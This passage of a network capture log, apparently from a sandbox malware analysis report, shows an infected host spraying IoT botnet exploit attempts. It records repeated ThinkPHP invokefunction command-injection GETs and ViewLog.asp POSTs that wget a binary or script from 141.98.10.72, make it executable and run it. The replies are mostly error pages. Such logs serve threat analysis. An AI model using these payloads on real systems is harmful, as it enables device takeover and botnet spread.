                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:42Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      396192.168.2.154969095.217.145.16580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.818025112 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:48.044850111 CET404INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:47 GMT
                                                      Server: Apache
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      397192.168.2.156094294.46.180.618080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.880026102 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:48.101825953 CET1286INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:47 GMT
                                                      Server: Apache
                                                      Accept-Ranges: bytes
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: 0
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      398192.168.2.155344831.136.127.368080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.883192062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:48.569672108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:49.913549900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:52.665457010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:58.041317940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:08.792967081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:31.064588070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:14.071403027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      399192.168.2.153555494.26.7.1498080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.909037113 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:48.160341024 CET109INHTTP/1.1 302 Found
                                                      Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      400192.168.2.154318294.120.236.1918080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.942490101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      401192.168.2.1539686112.177.57.880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:48.325813055 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:48.612648964 CET506INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:29:47 GMT
                                                      Server: httpd
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      402192.168.2.1540938112.222.35.15880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:48.338598967 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:48.639293909 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:48 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      403192.168.2.1545590112.132.215.15380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:48.351281881 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:48.663229942 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:31:32 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      404192.168.2.1546576112.192.19.9780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:48.420063019 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      405192.168.2.1559498112.197.81.18780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:48.436887026 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:48.840914011 CET339INHTTP/1.0 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 15:29:48 GMT
                                                      Server: Boa/0.94.14rc21
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Content-Type: text/html; charset=ISO-8859-1
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      406192.168.2.153991695.177.14.2458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.427334070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:50.630389929 CET659INHTTP/1.0 404 Not Found !!!
                                                      Pragma: no-cache
                                                      Content-type: text/html
                                                      <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      407192.168.2.155058831.136.63.488080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.427473068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
